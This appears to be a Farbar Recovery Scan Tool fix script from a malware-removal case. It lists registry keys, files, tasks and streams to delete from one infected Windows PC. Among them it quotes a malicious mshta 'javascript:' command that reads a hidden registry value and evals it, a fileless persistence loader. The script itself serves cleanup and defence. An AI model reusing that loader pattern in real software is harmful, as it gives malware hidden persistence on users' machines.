CloseProcesses:
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\...\Run: [**kunlt<*>] => "C:\Users\Dale\AppData\Local\e2f44a7\015e8c8.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\...\Policies\Explorer: [NoInstrumentation] 1
Toolbar: HKU\S-1-5-21-2722837513-1420934957-2528714982-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
S3 NAVENG; \??\C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\SDSDefs\20160626.001\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\SDSDefs\20160626.001\EX64.SYS [X]
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00030839.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00030226.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00029972.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00029940.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00029918.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00029280.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00029158.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00028963.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00027846.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00027322.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00026541.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00025928.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00025805.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00025163.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00025012.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00024788.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00024253.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00022551.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00021551.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00020768.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00020508.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00020099.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00019906.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00019714.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00019083.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00019001.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00018937.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00018628.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00018240.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00018051.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00017376.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00017295.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00016852.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00016814.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00016673.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00016164.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00015783.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00015280.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00015234.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00015151.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00014974.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00014820.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00014220.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00014157.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00013284.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00012867.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00012802.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00012309.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00011535.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00011478.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00011376.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00010774.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00010023.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00009671.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00009339.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00009267.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00009059.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00009043.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00007802.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00007557.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00007344.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00007009.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00005240.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00004889.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00004142.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00004097.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00003941.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00002180.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00001474.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00001240.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00001024.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00032574.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00032524.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00030824.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00029806.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00028199.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00026446.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00026097.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00025861.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00023992.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00023161.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00022803.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00021890.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00021069.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00020921.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00019675.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00019576.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00019116.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00017533.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00016828.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00012032.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00012012.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00009045.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00007928.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00007865.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00004833.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00004177.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00004028.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00002376.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00001229.tmp
C:\Users\Dale\QDATAOFXLOG.DAT
C:\Users\Dale\QDATAOFXOLD.DAT
Task: {2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
Task: {93188D78-690F-4D0C-883C-D3A8B7FAABAC} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION
Task: {AC4E5ACF-89F7-4220-BA21-81EE183975E2} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
Task: {CEE64558-E1A7-4D9D-80A7-2001912BE5B5} - \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector -> No File <==== ATTENTION
Task: {E53E44FB-9B83-426E-A9FB-B394E57995A5} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION
Task: {FA2BC0A6-8D4B-458A-85C8-2B8C72487513} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> No File <==== ATTENTION
Shortcut: C:\Users\Dale\AppData\Local\e2f44a7\015e8c8.lnk -> C:\Users\Dale\AppData\Local\e2f44a7\02ab8e0.bat ()
AlternateDataStreams: C:\ProgramData\TEMP:792D4CF1 [169]
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Software\Classes\3e97b17: "C:\Windows\system32\mshta.exe" "javascript:b5dsr0N="j7b";Q80T=new ActiveXObject("WScript.Shell");APdJ5x9="j";G8WHH=Q80T.RegRead("HKCU\\software\\qwgcellmqw\\wgis");kmh2VOPj="aKOOEp";eval(G8WHH);l4KSR8="JdLe8SE";" <===== ATTENTION
DeleteKey:HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Software\Classes\3e97b17 
DeleteKey:HKCU\\software\\qwgcellmqw
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset catalog
CMD: ipconfig /flushdns
RemoveProxy:
hosts:
Emptytemp: